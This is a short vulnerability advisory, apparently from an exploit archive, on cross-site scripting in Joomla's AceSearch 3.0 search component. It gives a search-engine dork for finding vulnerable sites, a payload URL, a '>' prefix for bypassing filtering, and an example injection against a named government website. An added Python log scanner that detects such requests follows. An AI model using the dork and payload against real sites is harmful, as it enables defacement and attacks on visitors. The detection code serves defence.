Joomla AceSearch component version 3.0 suffers from a cross site scripting vulnerability.
e7a05ee0db5238182077cb146d0bce90318ec17be3495461f1abfbfc7421e6d8
#Title : Joomla Component AceSearch Cross Site Scripting
#Author : DevilScreaM
#Date : 5 January 2014
#Category : Web Applications
#Product : http://www.joomace.net/joomla-extensions/acesearch/
#Version : 3.0
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozilla, Chrome, Opera -> Windows & Linux
#Vulnerability : Cross Site Scripting
#Dork : inurl:component/acesearch/
Cross Site Scripting
http://site-target/component/acesearch/search?query=>[XSS]
Prefix the payload with > to bypass Cross Site Scripting filtering
Example :
http://kpi.go.id/index.php/component/acesearch/search?query=><h1>DevilScreaM</h1>
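
Detection example (added here, not part of the original advisory): a log check that flags requests to the AceSearch search path whose query parameter decodes to a value containing < or >, including double percent-encoded forms. It assumes combined-format web server access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
ACESEARCH_PATH = "/component/acesearch/search"  # path given in the advisory
MARKUP_CHARS = re.compile(r"[<>]")              # characters the reported payload relies on

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253E -> %3E -> >)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_query(log_line):
    """Return the decoded `query` value if the line is an AceSearch search
    request carrying < or >, otherwise None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if ACESEARCH_PATH not in url.path.lower():
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get("query", []):
        value = fully_decode(raw)  # parse_qs already decoded one layer
        if MARKUP_CHARS.search(value):
            return value
    return None

def scan(lines):
    """Return (line_index, decoded_value) for every flagged log line."""
    found = ((i, suspicious_query(line)) for i, line in enumerate(lines))
    return [(i, v) for i, v in found if v is not None]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jan/2014:10:00:01 +0000] "GET /component/acesearch/search?query=joomla+templates HTTP/1.1" 200 5120',
    '192.0.2.11 - - [05/Jan/2014:10:00:07 +0000] "GET /index.php/component/acesearch/search?query=%3E%3Ch1%3Etest%3C%2Fh1%3E HTTP/1.1" 200 5344',
    '192.0.2.12 - - [05/Jan/2014:10:00:09 +0000] "GET /component/acesearch/search?query=%253E%253Ch1%253Etest HTTP/1.1" 200 5301',
    '192.0.2.13 - - [05/Jan/2014:10:00:12 +0000] "GET /component/content/article?id=7 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for index, value in scan(SAMPLE_LOG):
        print(f"line {index}: query={value!r}")
```

A hit means markup characters reached the search endpoint, not that they were reflected unescaped; confirm against the rendered response and the installed AceSearch version.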